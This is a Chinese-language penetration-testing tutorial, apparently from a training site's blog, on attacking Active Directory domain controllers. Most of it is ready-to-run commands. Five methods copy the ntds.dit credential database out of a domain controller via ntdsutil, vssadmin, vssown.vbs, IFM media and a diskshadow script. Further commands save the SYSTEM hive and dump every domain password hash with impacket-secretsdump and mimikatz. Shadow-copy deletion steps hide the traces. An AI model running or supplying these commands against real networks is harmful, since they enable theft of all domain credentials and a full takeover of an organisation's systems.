内网渗透:域控制器安全
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
作者 小苏
提取ntds.dit:
ntds.dit作用:
保存了所有目录活动数据,可以破译进行hash获取制作票据
方法一:通过ntdsutil.exe提取ntds.dit
指令:
ntdsutil snapshot “activate instance ntds” create quit quit
1.创建快照保存其中GUID值
{351d4f2c-7eed-431c-be9a-33f60df84733}
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
2.加载快照
指令:
ntdsutil snapshot “mount {351d4f2c-7eed-431c-be9a-33f60df84733}” quit quit
这一步可以看到被加载到哪一个目录下
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
3.将ntds.dit复制出来
指令:
copy C:\$SNAP_202201071706_VOLUMEC$\Windows\NTDS\ntds.dit C:\Users\liukaifeng01\Desktop
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
5.确认删除,提裤子
ntdsutil snapshot “List All” quit quit
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
方法二:vssadmin提取ntds.dit
1.创建c盘卷影拷贝
指令:
vssadmin create shadow /for=c:
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
2.在创建的卷影里将ntds.dit复制出来
指令:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\NTDS\ntds.dit c:\ntds.dit
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
3.删除创建的卷影
指令:
vssadmin delete shadows /for=c: /quiet
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
方法三:利用 vssown.vbs脚本提取
1.启动拷贝卷影的服务
cscript vssown.vbs /start
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
2.创建c盘卷影
cscript vssown.vbs /create c
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
3.列出当前的拷贝卷影
cscript vssown.vbs /list
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
4.拷贝出文件
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\windows\NTDS\ntds.dit c:\ntds.dit
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
5.删除卷影
cscript vssown.vbs /delete {3D20A65B-9BF8-426A-A15A-92BC04879EF7}//GUID
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
方法四: 利用ntdsutil IFM功能创建卷影拷贝
1.创建IFM媒体
指令:
ntdsutil “ac i ntds” “ifm” “create full c:/test” q q
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
2.将ntds.dit和system复制到目录下
指令:
dir “c:\test\Active Directory”
dir “c:\test\registry”
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
3.复制出ntds文件删除test文件夹
指令:
rmdir /s /q test
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
4.可以利用nishang的脚本进行复制
指令:
Import-Module .\Copy-VSS.ps1
Copy-vss
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
方法五:diskshadow导出ntds.dit文件
这是微软自带的软件,可以执行txt里的指令
指令:
diskshadow /s c:\1.txt
TXT内容:
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% k:
exec “cmd.exe” /c copy K:\Windows\NTDS\ntds.dit c:\ntds.dit
delete shadows all
list shadows all
reset
exit
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
再将system.hive提取
reg save hklm\system c:\windows\temp\system.hive
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
导出ntds.dit的散列值:
方法一:使用 impacket包导出
前提:导出ntds.dit必须要有system文件
指令:
impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
方法二:mimikatz获取域散列值
指令:
privilege::debug
lsadump::lsa /inject
![内网渗透:域控制器安全](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/3430.html